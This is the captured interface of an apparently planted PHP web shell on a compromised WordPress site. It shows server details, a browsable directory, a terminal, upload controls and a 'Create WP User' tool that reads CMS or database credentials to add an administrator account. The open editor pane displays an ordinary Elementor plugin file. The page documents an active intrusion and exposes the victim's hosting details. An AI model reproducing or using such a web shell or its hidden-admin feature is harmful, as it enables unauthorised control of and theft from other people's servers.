Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
elementor
/
modules
/
promotions
/
controls
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
atomic-promotion-control.php
473.00 B
-rw-r--r--
2026-05-26 14:37
promotion-control.php
1.22 KB
-rw-r--r--
2026-02-24 12:19
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
promotion-control.php
<?php namespace Elementor\Modules\Promotions\Controls; use Elementor\Base_Data_Control; class Promotion_Control extends Base_Data_Control { const TYPE = 'promotion_control'; public function get_type() { return static::TYPE; } public function content_template() { ?> <div data-promotion="{{{ data.name }}}" class="elementor-control-type-switcher elementor-label-inline e-control-promotion__wrapper"> <div class="elementor-control-content"> <div class="elementor-control-field"> <# if ( data.label ) {#> <label for="<?php $this->print_control_uid(); ?>" class="elementor-control-title">{{{ data.label }}}</label> <# } #> <span class="e-control-promotion__lock-wrapper"> <i class="eicon-lock"></i> </span> <div class="elementor-control-input-wrapper"> <label class="elementor-switch elementor-control-unit-2 e-control-promotion-switch"> <input type="checkbox" class="elementor-switch-input" disabled> <span class="elementor-switch-label" data-off="Off"></span> <span class="elementor-switch-handle"></span> </label> </div> <div class="e-promotion-react-wrapper" data-promotion="{{{ data.name }}}"></div> </div> </div> </div> <?php } }
关闭
保存